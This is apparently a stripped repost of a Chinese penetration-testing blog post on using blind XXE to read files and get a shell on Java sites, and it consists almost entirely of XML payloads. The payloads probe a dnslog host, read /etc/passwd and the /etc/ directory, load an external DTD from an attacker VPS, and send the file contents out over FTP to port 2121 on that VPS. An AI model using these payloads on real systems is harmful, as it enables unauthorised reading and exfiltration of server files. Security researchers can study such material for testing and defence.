目录
Blind XXE读取任意文件Getshell
<!ENTITY % remote SYSTEM "http://eja5f2.dnslog.cn">
%remote;]>
<root/>
<reg><name>111</name><tel>222</tel><email>333</email></reg>
<!ENTITY % all "<!ENTITY % send SYSTEM 'ftp://vps的地址:2121/%file;'>">
%all;
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://VPS的IP/xml.dtd">
%dtd;
%send;
]>
<reg><name>11</name><tel>22</tel><email>33</email></reg>
<!ENTITY % file SYSTEM "file:///etc/">
<!ENTITY % dtd SYSTEM "http://VPS的IP/xml.dtd">
%dtd;
%send;
]>
<reg><name>11</name><tel>22</tel><email>33</email></reg>
来源:谢公子的博客
责编:Zuo
本文始发于微信公众号(谢公子学安全):渗透测试|利用Blind XXE Getshell(Java网站)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论